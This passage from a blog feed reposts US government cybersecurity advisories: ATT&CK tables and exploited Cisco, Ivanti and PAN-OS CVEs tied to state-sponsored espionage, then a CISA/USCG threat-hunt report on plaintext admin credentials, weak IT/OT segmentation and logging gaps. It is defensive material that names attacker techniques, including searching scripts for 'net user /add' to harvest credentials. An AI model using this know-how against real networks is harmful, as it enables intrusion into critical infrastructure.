<td><a href="https://attack.mitre.org/versions/v17/techniques/T1005/" target="_blank" title="T1005">T1005</a></td>
<td>Passively collect PCAP from specific ISP customer networks</td>
</tr>
</tbody>
</table>
<table class="tablesaw tablesaw-stack">
<caption><strong>Table 19</strong>: Command and Control</caption>
<thead>
<tr>
<th role="columnheader"><strong>Technique Title</strong></th>
<th role="columnheader"><strong>ID</strong></th>
<th role="columnheader"><strong>Use</strong></th>
</tr>
</thead>
<tbody>
<tr>
<td>Proxy</td>
<td><a href="https://attack.mitre.org/versions/v17/techniques/T1090/" target="_blank" title="T1090">T1090</a></td>
<td>Use VPS for C2</td>
</tr>
<tr>
<td>Proxy: Multi-hop Proxy</td>
<td><a href="https://attack.mitre.org/versions/v17/techniques/T1090/003/" target="_blank" title="T1090.003">T1090.003</a></td>
<td>Leverage open source multi-hop pivoting tools, such as STOWAWAY, to build chained relays for command and control and operator access</td>
</tr>
<tr>
<td>Application Layer Protocol</td>
<td><a href="https://attack.mitre.org/versions/v17/techniques/T1071/" target="_blank" title="T1071">T1071</a></td>
<td>Open and expose a variety of different services (e.g., Secure Shell [SSH], Secure File Transfer Protocol [SFTP], Remote Desktop Protocol [RDP], File Transfer Protocol [FTP], HTTP, HTTPS)</td>
</tr>
<tr>
<td>Non-Standard Port</td>
<td><a href="https://attack.mitre.org/versions/v17/techniques/T1571/" target="_blank" title="T1571">T1571</a></td>
<td>Utilize non-standard ports to evade detection by security monitoring tools that focus on standard port activity</td>
</tr>
<tr>
<td>Protocol Tunneling</td>
<td><a href="https://attack.mitre.org/versions/v17/techniques/T1572/" target="_blank" title="T1572">T1572</a></td>
<td>Create tunnels over protocols such as GRE, mGRE, or IPsec on network devices</td>
</tr>
<tr>
<td>Non-Application Layer Protocol</td>
<td><a href="https://attack.mitre.org/versions/v17/techniques/T1095/" target="_blank" title="T1095">T1095</a></td>
<td>Use GRE/IPsec to carry C2 over non-application layer protocols</td>
</tr>
</tbody>
</table>
<table class="tablesaw tablesaw-stack">
<caption><a class="ck-anchor" id="Table20"><strong>Table 20</strong></a>: Exfiltration</caption>
<thead>
<tr>
<th role="columnheader"><strong>Technique Title</strong></th>
<th role="columnheader"><strong>ID</strong></th>
<th role="columnheader"><strong>Use</strong></th>
</tr>
</thead>
<tbody>
<tr>
<td>Exfiltration over Alternative Protocol</td>
<td><a href="https://attack.mitre.org/versions/v17/techniques/T1048/003/" target="_blank" title="T1048.003">T1048.003</a></td>
<td>Use tunnels, such as IPsec and GRE, to conduct C2 and exfiltration activities</td>
</tr>
</tbody>
</table>
<h2><a class="ck-anchor" id="AppB"><strong>Appendix B: CVEs exploited</strong></a></h2>
<table class="tablesaw tablesaw-stack">
<caption><strong>Table 21</strong>: Exploited CVE information</caption>
<thead>
<tr>
<th role="columnheader"><strong>CVE&nbsp;</strong></th>
<th role="columnheader"><strong>Vendor/Product&nbsp;</strong></th>
<th role="columnheader"><strong>Details</strong></th>
</tr>
</thead>
<tbody>
<tr>
<td><a href="https://www.cve.org/CVERecord?id=CVE-2024-21887" target="_blank" title="CVE-2024-21887">CVE-2024-21887</a></td>
<td>Ivanti Connect Secure and Ivanti Policy</td>
<td>Command injection vulnerability, commonly chained after <a href="https://www.cve.org/CVERecord?id=CVE-2023-46805" target="_blank" title="CVE-2023-46805">CVE-2023-46805</a> (authentication bypass)</td>
</tr>
<tr>
<td><a href="https://www.cve.org/CVERecord?id=CVE-2024-3400" target="_blank" title="CVE-2024-3400">CVE-2024-3400</a></td>
<td>Palo Alto Networks PAN-OS GlobalProtect</td>
<td>Arbitrary file creation leading to OS command injection, allowing for unauthenticated remote code execution (RCE) on firewalls when GlobalProtect is enabled on specific versions/configurations</td>
</tr>
<tr>
<td><a href="https://www.cve.org/CVERecord?id=CVE-2023-20273" target="_blank" title="CVE-2023-20273">CVE-2023-20273</a></td>
<td>Cisco IOS XE</td>
<td>Web management user interface post-authentication command injection/privilege escalation (commonly chained with <a href="https://www.cve.org/CVERecord?id=CVE-2023-20198" target="_blank" title="CVE-2023-20198">CVE-2023-20198</a> for initial access to achieve code execution as root)</td>
</tr>
<tr>
<td><a href="https://www.cve.org/CVERecord?id=CVE-2023-20198" target="_blank" title="CVE-2023-20198">CVE-2023-20198</a></td>
<td>Cisco IOS XE</td>
<td>Authentication bypass vulnerability to create unauthorized administrative accounts</td>
</tr>
<tr>
<td><a href="https://www.cve.org/CVERecord?id=CVE-2018-0171" target="_blank" title="CVE-2018-0171">CVE-2018-0171</a></td>
<td>Cisco IOS and IOS XE</td>
<td>Smart Install remote code execution vulnerability</td>
</tr>
</tbody>
</table>
<br />
<h2><a class="ck-anchor" id="AppC"><strong>Appendix C: MITRE D3FEND Countermeasures</strong></a></h2>
<table class="tablesaw tablesaw-stack">
<caption><strong>Table 22</strong>: MITRE D3FEND countermeasures</caption>
<thead>
<tr>
<th role="columnheader"><strong>Countermeasure Title&nbsp;</strong></th>
<th role="columnheader"><strong>ID&nbsp;</strong></th>
<th role="columnheader"><strong>Details&nbsp;</strong></th>
</tr>
</thead>
<tbody>
<tr>
<td>
<div class="TableCellContent SCXW15743482 BCX8">
<div class="OutlineElement Ltr SCXW15743482 BCX8">
<p>Platform Monitoring&nbsp;</p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW15743482 BCX8">
<div class="OutlineElement Ltr SCXW15743482 BCX8">
<p><a href="https://d3fend.mitre.org/technique/d3f:PlatformMonitoring/" target="_blank" title="D3-PM ">D3-PM&nbsp;</a></p>
</div>
</div>
</td>
<td>Regularly review network device (especially router) logs and configurations for evidence of any unexpected, unapproved, or unusual activity, especially for changes to network tunnels, AAA configurations, ACLs, packet captures or network mirroring, and virtual containers</td>
</tr>
<tr>
<td>Network Traffic Community Deviation</td>
<td><a href="https://d3fend.mitre.org/technique/d3f:NetworkTrafficCommunityDeviation/" target="_blank" title="D3-NTCD">D3-NTCD</a></td>
<td>Check for unexpected GRE or other tunneling protocols, unexpected TACACS+ or RADIUS servers, or other unusual traffic</td>
</tr>
<tr>
<td>
<div class="TableCellContent SCXW265882884 BCX8">
<div class="OutlineElement Ltr SCXW265882884 BCX8">
<p>Outbound Traffic Filtering&nbsp;</p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW265882884 BCX8">
<div class="OutlineElement Ltr SCXW265882884 BCX8">
<p><a href="https://d3fend.mitre.org/technique/d3f:OutboundTrafficFiltering/" target="_blank" title="D3-OTF">D3-OTF</a>&nbsp;</p>
</div>
</div>
</td>
<td>Disable outbound connections from management interfaces</td>
</tr>
<tr>
<td>
<div class="TableCellContent SCXW12378772 BCX8">
<div class="OutlineElement Ltr SCXW12378772 BCX8">
<p>Application Configuration Hardening&nbsp;</p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW12378772 BCX8">
<div class="OutlineElement Ltr SCXW12378772 BCX8">
<p><a href="https://d3fend.mitre.org/technique/d3f:ApplicationConfigurationHardening/" target="_blank" title="D3-ACH">D3-ACH&nbsp;</a></p>
</div>
</div>
</td>
<td>Disable all unused ports and protocols (both traffic and management protocols), disable Cisco smart install, disable Cisco Guest Shell, use only strong cryptographic algorithms</td>
</tr>
<tr>
<td>Change Default Password</td>
<td><a href="https://d3fend.mitre.org/technique/d3f:ChangeDefaultPassword/" target="_blank" title="D3-CFP">D3-CFP</a></td>
<td>Change all default administrative credentials and SNMP community strings</td>
</tr>
<tr>
<td>
<div class="TableCellContent SCXW144528759 BCX8">
<div class="OutlineElement Ltr SCXW144528759 BCX8">
<p>Credential Hardening&nbsp;</p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW144528759 BCX8">
<div class="OutlineElement Ltr SCXW144528759 BCX8">
<p><a href="https://d3fend.mitre.org/technique/d3f:CredentialHardening/" target="_blank" title="D3-CH">D3-CH</a>&nbsp;</p>
</div>
</div>
</td>
<td>Disable password authentication where possible, use strong PKI-based or multifactor authentication, use strong cryptographic password storage settings (i.e., Cisco Type 8), and use lockouts to slow brute force attempts</td>
</tr>
<tr>
<td>
<div class="TableCellContent SCXW160303247 BCX8">
<div class="OutlineElement Ltr SCXW160303247 BCX8">
<p>Software Update&nbsp;</p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW160303247 BCX8">
<div class="OutlineElement Ltr SCXW160303247 BCX8">
<p><a href="https://d3fend.mitre.org/technique/d3f:SoftwareUpdate/" target="_blank" title="D3-SU">D3-SU</a>&nbsp;</p>
</div>
</div>
</td>
<td>Update software to patch known vulnerabilities and upgrade devices to supported versions</td>
</tr>
<tr>
<td>
<div class="TableCellContent SCXW175383487 BCX8">
<div class="OutlineElement Ltr SCXW175383487 BCX8">
<p>Network Isolation&nbsp;</p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW175383487 BCX8">
<div class="OutlineElement Ltr SCXW175383487 BCX8">
<p><a href="https://d3fend.mitre.org/technique/d3f:NetworkIsolation/" target="_blank" title="D3-NI">D3-NI</a>&nbsp;</p>
</div>
</div>
</td>
<td>Implement management-plane isolation and control-plane policing (CoPP) to keep all network management traffic separate from data plane traffic</td>
</tr>
<tr>
<td>
<div class="TableCellContent SCXW19928184 BCX8">
<div class="OutlineElement Ltr SCXW19928184 BCX8">
<p>Inbound Traffic Filtering&nbsp;</p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW19928184 BCX8">
<div class="OutlineElement Ltr SCXW19928184 BCX8">
<p><a href="https://d3fend.mitre.org/technique/d3f:InboundTrafficFiltering/" target="_blank" title="D3-ITF">D3-ITF</a>&nbsp;</p>
</div>
</div>
</td>
<td>Ensure management VRFs cannot receive traffic from the data plane</td>
</tr>
</tbody>
</table>
</div>
</div>
<p>Source: US-CERT Alerts</p>
]]></content:encoded>
			<wfw:commentRss>http://disensogroup.com/countering-chinese-state-sponsored-actors-compromise-of-networks-worldwide-to-feed-global-espionage-system/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>CISA and USCG Identify Areas for Cyber Hygiene Improvement After Conducting Proactive Threat Hunt at US Critical Infrastructure Organization</title>
		<link>http://disensogroup.com/cisa-and-uscg-identify-areas-for-cyber-hygiene-improvement-after-conducting-proactive-threat-hunt-at-us-critical-infrastructure-organization/</link>
		<comments>http://disensogroup.com/cisa-and-uscg-identify-areas-for-cyber-hygiene-improvement-after-conducting-proactive-threat-hunt-at-us-critical-infrastructure-organization/#comments</comments>
		<pubDate>Tue, 29 Jul 2025 17:53:52 +0000</pubDate>
		<dc:creator><![CDATA[pdisenso]]></dc:creator>
				<category><![CDATA[Uncategorized]]></category>
		<category><![CDATA[aside format]]></category>

		<guid isPermaLink="false">http://disensogroup.com/cisa-and-uscg-identify-areas-for-cyber-hygiene-improvement-after-conducting-proactive-threat-hunt-at-us-critical-infrastructure-organization/</guid>
		<description><![CDATA[Summary The Cybersecurity and Infrastructure Security Agency (CISA) and U.S. Coast Guard (USCG) are issuing this Cybersecurity Advisory to present findings from a recent CISA and USCG hunt engagement. The purpose of this advisory is to highlight identified cybersecurity issues, thereby informing security defenders in other organizations of potential similar issues and encouraging them to...]]></description>
				<content:encoded><![CDATA[<div class="WordSection1">
<h2><strong>Summary</strong></h2>
<p><em>The Cybersecurity and Infrastructure Security Agency (CISA) and U.S. Coast Guard (USCG) are issuing this Cybersecurity Advisory to present findings from a recent CISA and USCG hunt engagement. The purpose of this advisory is to highlight identified cybersecurity issues, thereby informing security defenders in other organizations of potential similar issues and encouraging them to take proactive measures to enhance their cybersecurity posture. This advisory has been coordinated with the organization involved in the hunt engagement.</em></p>
<p>CISA led a proactive hunt engagement at a U.S. critical infrastructure organization with the support of USCG analysts. During hunts, CISA proactively searches for evidence of malicious activity or malicious cyber actor presence on customer networks. The organization invited CISA to conduct a proactive hunt to determine if an actor had been present in the organization’s environment. (<strong>Note:</strong> Henceforth, unless otherwise defined, “CISA” is used in this advisory to refer to the hunt team as an umbrella for both CISA and USCG analysts).</p>
<p>During this engagement, CISA did not identify evidence of malicious cyber activity or actor presence on the organization’s network, but did identify cybersecurity risks, including:</p>
<ul>
<li>Insufficient logging;</li>
<li>Insecurely stored credentials;</li>
<li>Shared local administrator (admin) credentials across many workstations;</li>
<li>Unrestricted remote access for local admin accounts;</li>
<li>Insufficient network segmentation configuration between IT and operational technology (OT) assets; and</li>
<li>Several device misconfigurations.</li>
</ul>
<p>In coordination with the organization where the hunt was conducted, CISA and USCG are sharing cybersecurity risk findings and associated mitigations to assist other critical infrastructure organizations with improving their cybersecurity posture. Recommendations are listed for each of CISA’s findings, as well as general practices to strengthen cybersecurity for OT environments. These mitigations align with CISA and the National Institute for Standards and Technology’s (NIST) <a href="https://www.cisa.gov/cybersecurity-performance-goals-cpgs" title="Cross-Sector Cybersecurity Performance Goals (CPGs)">Cross-Sector Cybersecurity Performance Goals (CPGs)</a>, and with mitigations provided in the USCG Cyber Command’s (CGCYBER) <a href="https://www.uscg.mil/Portals/0/Images/cyber/CGCYBER%202024%20CTIME.pdf?ver=AgbTrQoh4Fs91HUmdhd_xA%3d%3d&amp;timestamp=1747657640065" target="_blank" title="2024 Cyber Trends and Insights in the Marine Environment Report">2024 Cyber Trends and Insights in the Marine Environment (CTIME) Report</a>.</p>
</div>
<p>Although no malicious activity was identified during this engagement, critical infrastructure organizations are advised to review and implement the mitigations listed in this advisory to prevent potential compromises and better protect our national infrastructure. These mitigations include the following (listed in order of importance):</p>
<ul>
<li><strong>Do not store passwords or credentials in plaintext.&nbsp;</strong>Instead, <strong>use secure password and credential management solutions&nbsp;</strong>such as encrypted password vaults, managed service accounts, or built-in secure features of deployment tools.
<ul>
<li><strong>Ensure that all credentials are encrypted&nbsp;</strong>both at rest and in transit. Implement<strong> strict access controls and regular audits&nbsp;</strong>to securely manage scripts or tools accessing credentials.</li>
<li>Use code reviews and automated scanning tools to<strong> detect and eliminate any instances of plaintext credentials on hosts or workstations.</strong></li>
<li><strong>Enforce the principle of least privilege</strong>, only granting users and processes the access necessary to perform their functions.</li>
</ul>
</li>
<li><strong>Avoid sharing local administrator account credentials.&nbsp;</strong>Instead,<strong> provision unique, complex passwords for each account&nbsp;</strong>using tools like Microsoft’s Local Administrator Password Solution (LAPS) that automate password management and rotation.</li>
<li>Enforce <strong>multifactor authentication (MFA) for all administrative access</strong>, including local and domain accounts, and for remote access methods such as Remote Desktop Protocol (RDP) and virtual private network (VPN) connections.</li>
<li>Implement and enforce strict policies to only <strong>use hardened bastion hosts isolated from IT networks equipped with phishing-resistant MFA to access industrial control systems (ICS)/OT networks</strong>, and ensure regular workstations (i.e., workstations used for accessing IT networks and applications) cannot be used to access ICS/OT networks.</li>
<li><strong>Implement comprehensive (i.e., large coverage) and detailed logging across all systems</strong>, including workstations, servers, network devices, and security appliances.
<ul>
<li>Ensure logs <strong>capture information such as authentication attempts, command-line executions with arguments, and network connections</strong>.</li>
<li><strong>Retain logs for an appropriate period to enable thorough historical analysis</strong> (adhering to organizational policies and compliance requirements) and <strong>aggregate logs in an out-of-band, centralized location</strong>, such as a security information event management (SIEM) tool, to protect them from tampering and facilitate efficient analysis.</li>
</ul>
</li>
</ul>
<p>For more detailed mitigations addressing the identified cybersecurity risks, see the&nbsp;<strong>Mitigations&nbsp;</strong>section of this advisory.</p>
<p>Download the PDF version of this report:</p>
<div class="c-file">
<div class="c-file__download">
    <a href="https://www.cisa.gov/sites/default/files/2025-07/joint-advisory-cisa-identifies-areas-for-cyber-hygiene-improvement-after-conducting-proactive-threat-hunt.pdf" class="c-file__link" target="_blank">AA25-212A CISA and USCG Identify Areas for Cyber Hygiene Improvement</a><br />
    <span class="c-file__size">(PDF,       596.91 KB<br />
  )</span>
  </div>
</div>
<h2><strong>Technical Details</strong></h2>
<p><strong>Note:</strong> This advisory uses the <a href="https://attack.mitre.org/versions/v17/matrices/enterprise/" target="_blank" title="MITRE ATT&amp;CK Matrix for Enterprise">MITRE ATT&amp;CK<sup>®</sup> Matrix for Enterprise</a> framework, version 17. See <strong>Appendix: MITRE ATT&amp;CK Tactics and Techniques</strong> for a table of potential activity mapped to MITRE ATT&amp;CK tactics and techniques.</p>
<h3>Overview</h3>
<p>Cybersecurity and Infrastructure Security Agency (CISA) and United States Coast Guard (USCG) analysts (collectively referred to as CISA in this report) conducted a threat hunt engagement at a critical infrastructure organization. During this hunt, CISA proactively searched for evidence of malicious activity or the presence of a malicious cyber actor on the customer’s network using host, network, industrial control system (ICS), and commercial cloud and open-source analysis tools. CISA searched for evidence of activity by looking for specific exploitation tactics, techniques, and procedures (TTPs) and associated artifacts.</p>
<p>While CISA did not find evidence of threat actor presence on the organization’s network, the team did identify several cybersecurity risks. These findings are listed below in order of risk. Technical details of each identified cyber risk are included, along with the potential impact from threat actor exploitation of each risk (recommendations for mitigating each risk are listed in the Mitigations<strong>&nbsp;</strong>section below).</p>
<p>Several of these findings align with those observed during similar engagements conducted by US Coast Guard Cyber Command (CGCYBER), which are documented in their <a href="https://www.uscg.mil/Portals/0/Images/cyber/CGCYBER%202024%20CTIME.pdf?ver=AgbTrQoh4Fs91HUmdhd_xA%3d%3d&amp;timestamp=1747657640065" target="_blank" title="Cyber Trends and Insights in the Marine Environment (CTIME) Report">2024 Cyber Trends and Insights in the Marine Environment (CTIME)</a> report. The authoring agencies encourage critical infrastructure organizations to review the CTIME report to understand trends in the techniques/attack paths threat actors are using to compromise at-risk organizations, and what mitigations organizations should implement to prevent a successful attack.</p>
<h3>Key Findings</h3>
<h4><strong>Shared Local Admin Accounts with Non-Unique Passwords Stored as Plaintext</strong></h4>
<p><strong>Details:&nbsp;</strong>CISA identified a few local admin accounts with non-unique passwords; these accounts were shared across many hosts. The credentials for each account were stored plaintext in batch scripts. CISA discovered these authorized scripts were configured to create user accounts with local admin privileges and then set identical, non-expiring passwords—these passwords were stored in plaintext in the script. One script was configured to create an admin account (set with a password stored in the script in plaintext) and automatically add to the admin group. The account was set as the local admin account on many other hosts.</p>
<p><strong>Potential Impact:&nbsp;</strong>The storage of local admin credentials in plaintext scripts across numerous hosts increases the risk of widespread unauthorized access, and the usage of non-unique passwords facilitates lateral movement throughout the network. Malicious actors with access to workstations with either of these batch scripts could obtain the passwords for these local admin accounts by searching the filesystem for strings like <code>net user /add</code>, identifying scripts containing usernames and passwords [<a href="https://attack.mitre.org/versions/v16/techniques/T1552/001/" target="_blank" title="T1552.001">T1552.001</a>], and accessing these accounts to move laterally.</p>
<p>For example, during a controlled security validation exercise (with explicit permission from the customer), CISA used the credentials found in one of the scripts to log into its associated admin account locally on a workstation [<a href="https://attack.mitre.org/versions/v17/techniques/T1078/003/" target="_blank" title="T1078.003">T1078.003</a>], and then establish a Remote Desktop Protocol (RDP) connection to another workstation [<a href="https://attack.mitre.org/versions/v17/techniques/T1021/001/" target="_blank" title="T1021.001">T1021.001</a>]. This demonstrated that the credentials allowed local login to an admin account and enabled lateral movement to any workstation with the account. While using this account, the user had local admin privileges on many workstations. Upon initiating the RDP session, the system issued out a notification that another user was currently logged in and that continuing the session would disconnect the existing user, confirming that the account can be accessed remotely via RDP.</p>
<p>The uniform use of local admin accounts with identical, non-expiring passwords across numerous hosts, coupled with the storage of these credentials in plaintext within accessible scripts, elevates the risk of unauthorized access and lateral movement throughout the network.</p>
<p>With local admin access, malicious cyber actors can:</p>
<ul>
<li>Modify existing accounts or create new accounts [<a href="https://attack.mitre.org/versions/v17/techniques/T1098/" target="_blank" title="T1098">T1098</a>], potentially escalating privileges or maintaining persistent access.</li>
<li>Install malicious browser extensions on compromised systems [<a href="https://attack.mitre.org/versions/v17/techniques/T1112/" target="_blank" title="T1112">T1112</a>].</li>
<li>Communicate with compromised systems using standard application layer protocols [<a href="https://attack.mitre.org/versions/v17/techniques/T1071/" target="_blank" title="T1071">T1071</a>], which may bypass certain security monitoring tools.</li>
<li>Modify local policies to escalate privileges or disable security features [<a href="https://attack.mitre.org/versions/v17/techniques/T1484/" target="_blank" title="T1484">T1484</a>].</li>
<li>Alter system configurations or install software that executes at startup [<a href="https://attack.mitre.org/versions/v17/techniques/T1547/" target="_blank" title="T1547">T1547</a>], ensuring continued access and persistence.</li>
<li>Hijack the execution flow of applications to inject malicious code [<a href="https://attack.mitre.org/versions/v17/techniques/T1574/" target="_blank" title="T1574">T1574</a>].</li>
</ul>
<p>The widespread distribution of plaintext credentials and the use of identical passwords across hosts increases the risk of unauthorized access throughout the network. This vulnerability heightens the potential for attackers to conduct unauthorized activities, which may impact the confidentiality, integrity, and availability of the organization’s assets.</p>
<p><strong>Note:</strong> This finding was associated with workstations only; servers and other devices were not affected.</p>
<h4><strong>Insufficient Network Segmentation Configuration Between IT and Operational Technology Environments</strong></h4>
<p><strong>Details:</strong> While assessing interconnectivity between the customer’s IT and operational technology (OT) environments, CISA identified that the OT environment was not properly configured. Specifically, standard user accounts could directly access the supervisory control and data acquisition (SCADA) virtual local area network (VLAN) directly from IT hosts.</p>
<p>First, CISA determined it was possible to establish a connection via port <code>21</code> from a user workstation in the IT network to a system within the SCADA VLAN. The test established that a network path was available, the remote host was reachable, the port was open and listening for connections, and that the port was directly accessible between the IT and SCADA VLANs, with misconfigured network-level restrictions—for example, firewalls or access control lists (ACLs)—blocking the Transmission Control Protocol (TCP) connection on the port. This test was conducted using a standard user account on a regular IT workstation without administrative privileges [<a href="https://attack.mitre.org/versions/v15/techniques/T1078/" target="_blank" title="T1078">T1078</a>].</p>
<p>Second, CISA discovered that the customer did not have sufficient secured bastion hosts dedicated for accessing SCADA and heating, ventilation, and air conditioning (HVAC) systems. A bastion host­—sometimes referred to as a jump box or jump server—is a specialized, highly secured system (often a server or dedicated workstation) that serves as the sole access point between a network segment (such as an internal IT network) and a protected internal network (like an OT or ICS environment). By inspecting and filtering all inbound and outbound traffic, a bastion host is designed to prevent unauthorized access and lateral movement, ensuring that only authenticated and authorized users can interact with internal systems. Though several hosts were designated as bastion hosts for remote access to SCADA and HVAC systems, they lacked the enhanced security configuration, dedicated monitoring, and specialized scrutiny expected of bastion hosts.</p>
<p><strong>Potential&nbsp;Impact:&nbsp;</strong>Insufficient OT network segmentation configuration, network access control (NAC), and the ability of a non-privileged user within the IT network to use their credentials to access the critical SCADA VLAN [<a href="https://attack.mitre.org/versions/v17/techniques/T1078/" target="_blank" title="T1078">T1078</a>] presents a security and safety risk. Given that SCADA and HVAC systems control physical processes, compromises of these systems can have real-world consequences, including risks to personnel safety, infrastructure integrity, and equipment functionality.</p>
<p>Malicious actors could further exploit potentially unsecured workstations with access to OT systems, and insufficient network segmentation configuration between IT and OT systems, in the following ways:</p>
<ul>
<li>Use RDP or Secure Shell (SSH) protocols to move laterally from compromised IT workstations to OT systems [<a href="https://attack.mitre.org/versions/v17/techniques/T1021/001/" target="_blank" title="T1021.001">T1021.001</a>] [<a href="https://attack.mitre.org/versions/v17/techniques/T1021/004/" target="_blank" title="T1021.004">T1021.004</a>].</li>
<li>Execute commands and scripts using scripting languages like PowerShell to attack OT systems [<a href="https://attack.mitre.org/versions/v17/techniques/T1059/" target="_blank" title="T1059">T1059</a>].</li>
<li>Map network connections to identify paths to OT systems [<a href="https://attack.mitre.org/versions/v17/techniques/T1049/" target="_blank" title="T1049">T1049</a>].</li>
<li>Gather information about network configurations to plan attacks on OT systems [<a href="https://attack.mitre.org/versions/v17/techniques/T1016/" target="_blank" title="T1016">T1016</a>].</li>
</ul>
<p>By exploiting these weaknesses, attackers can potentially gain unauthorized access to critical OT systems, manipulate physical processes, disrupt operations, and cause harm.</p>
<h4><strong>Insufficient Log Retention and Implementation</strong></h4>
<p><strong>Details:</strong> CISA was unable to hunt for every MITRE ATT&amp;CK<sup>®</sup> procedure in the scoped hunt plan partly because the organization’s event logging system was insufficient for this analysis. For example, Windows event logs from workstations were not being forwarded to the organization’s security information event management (SIEM), verbose command line auditing was not enabled (meaning command line arguments were not being captured in Event ID <code>4688</code>), logging in the SIEM was not as comprehensive as required for the analysis, and log retention did not allow for a thorough analysis of historical activity.</p>
<p><strong>Potential Impact:&nbsp;</strong>The absence of comprehensive and detailed logs, along with a lack of an established baseline for normal network behavior, prevented CISA from performing thorough behavior and anomaly-based detection. This limitation hindered the ability to hunt for certain TTPs, such as <a href="https://www.cisa.gov/resources-tools/resources/identifying-and-mitigating-living-land-techniques">living-off-the-land techniques,</a> the use of valid accounts [<a href="https://attack.mitre.org/versions/v17/techniques/T1078/" target="_blank" title="T1078">T1078</a>], and other TTPs used by sophisticated threat actors. Such techniques often do not produce discrete indicators of compromise or trigger alerts from antivirus software, intrusion detection systems (IDS), or endpoint detection and response (EDR) solutions. Further, the lack of workstation logs in the organization’s SIEM meant CISA could not analyze authentication events to identify anomalous activities, such as unauthorized access using local administrator credentials. This gap exposes networks to undetected lateral movement and unauthorized access.</p>
<p>Insufficient logging can prevent the detection of malicious activity by hindering investigations, which makes detection of threat actors more challenging and leaves the network susceptible to undetected threats.</p>
<h3>Additional Findings</h3>
<h4><strong>Misconfigured sslFlags on a Production Server</strong></h4>
<p><strong>Details:</strong> CISA used PowerShell to examine the <code>ApplicationHost.config</code> file<sup>[</sup><a href="https://www.cisa.gov/news-events/cybersecurity-advisories/aa25-212a#_ftnref1" title="Footnote Reference 1"><sup>1</sup></a><sup>]</sup>—a central configuration file for Internet Information Services (IIS) that governs the behavior of the web server and its applications and websites—on a production IIS server. CISA observed an HTTPS binding configured with <code>sslFlags==“0”</code>, which keeps IIS in its legacy “one-certificate-per-IP” mode. This mode disables modern certificate-management features, and because mutual Transport Layer Security (TLS) (client-certificate authentication) must be enabled separately in “SSL Settings” or by adding <code>&lt;access sslFlags=“Ssl, SslRequireCert” /&gt;</code>, the binding leaves the client-certificate enforcement off by default, allowing any TLS client to complete the handshake anonymously. Moreover, <code>sslFlags</code>&nbsp;does not control protocol or cipher selection, so outdated protocols or weak cipher suites (e.g., SSL 3.0, TLS 1.0/1.1) may still be accepted unless Secure Channel (Schannel)<sup>[</sup><a href="https://www.cisa.gov/news-events/cybersecurity-advisories/aa25-212a#_ftnref2" title="Footnote Reference 2"><sup>2</sup></a><sup>]</sup> has been explicitly hardened.</p>
<p><strong>Potential Impact:&nbsp;</strong>The misconfigured <code>sslFlags</code> could enable threat actors to attempt an adversary-in-the-middle attack [<a href="https://attack.mitre.org/versions/v17/techniques/T1557/" target="_blank" title="T1557">T1557</a>] to intercept credentials and data transmitted between clients and the IIS server. Malicious actors could also exploit vulnerabilities in older Secure Sockets Layer (SSL)/TLS protocols, as well as weak cipher suites, increasing the risk for protocol downgrade attacks in which an attacker forces the server and client to negotiate the use of weaker encryption standards [<a href="https://attack.mitre.org/versions/v17/techniques/T1562/010/" target="_blank" title="T1562.010">T1562.010</a>]. This compromises the confidentiality and integrity of data transmitted over this channel. Furthermore, the absence of client certificate enforcement meant the server did not validate the identity of the connecting clients beyond the basic SSL/TLS handshake. This deficiency exposed the server to risks where unauthorized or malicious clients could impersonate legitimate users, potentially gaining access to sensitive resources without proper verification.</p>
<h4><strong>Misconfigured Structured Query Language Connections on a Production Server</strong></h4>
<p><strong>Details:&nbsp;</strong>CISA reviewed <code>machine.config</code> file on a production server and identified that it was configured with a centralized database connection string, <code>LocalSqlServer</code>, for both profile and role providers. This configuration implies that, unless overridden in each application’s <code>web.config</code> files, every ASP.NET site on the server connects to the same Structured Query Language (SQL) Express or <code>aspnetdb</code> database and shares the same credentials context.</p>
<p>Additionally, CISA identified that the <code>machine.config</code> file set the <code>minRequiredPasswordLength</code> to be less than 15 characters, which is <a href="https://www.cisa.gov/cybersecurity-performance-goals-cpgs#MinimumPasswordStrength2B" title="CISA’s recommended password length">CISA’s recommended password length</a>.</p>
<p><strong>Potential Impact: Using a centralized database approach&nbsp;</strong>increases risk, as a single breach or misconfiguration in this central SQL database server can compromise <strong>all&nbsp;</strong>applications dependent on the server. This creates a single point of failure and could be exploited by attackers aiming to gain broad access to the system.</p>
<p>Additionally, setting the minimum password length to any password under 15 characters is more vulnerable to various forms of brute-force attacks, such as password guessing [<a href="https://attack.mitre.org/versions/v17/techniques/T1110/001/" target="_blank" title="T1110.001">T1110.001</a>], cracking [<a href="https://attack.mitre.org/versions/v17/techniques/T1110/002/" target="_blank" title="T1110.002">T1110.002</a>], spraying [<a href="https://attack.mitre.org/versions/v17/techniques/T1110/003/" target="_blank" title="T1110.003">T1110.003</a>], and credential stuffing [<a href="https://attack.mitre.org/versions/v17/techniques/T1110/004/" target="_blank" title="T1110.004">T1110.004</a>]. If a threat actor successfully cracked these weak passwords, they could gain unauthorized access to user or application accounts and leverage vulnerabilities within applications to further escalate privileges, potentially leading to unauthorized access to the backend SQL Server databases. This could result in data breaches, data manipulation, or a loss of database integrity.</p>
<h2><strong>Mitigations</strong></h2>
<p>CISA and USCG recommend that critical infrastructure organizations implement the mitigations below to improve their organization’s cybersecurity posture. Recommendations to reduce cyber risk are listed for each of CISA’s findings during this engagement and are ordered starting from the highest to lowest importance for organizations to implement. CISA and USCG also include general practices to strengthen cybersecurity for OT environments that are not tied to specific findings.</p>
<p>These mitigations align with the <a href="https://www.cisa.gov/cybersecurity-performance-goals-cpgs" title="Cross-Sector Cybersecurity Performance Goals">Cross-Sector Cybersecurity Performance Goals</a> jointly developed by CISA and the National Institute for Standards and Technology (NIST). The Cybersecurity Performance Goals (CPGs) provide a minimum set of practices and protections that CISA and NIST recommend all organizations implement. CISA and NIST based the CPGs on existing cybersecurity frameworks and guidance to protect against the most common and impactful TTPs. Visit CISA’s <a href="https://www.cisa.gov/cybersecurity-performance-goals-cpgs" title="CPGs webpage">CPGs webpage</a> for more information.</p>
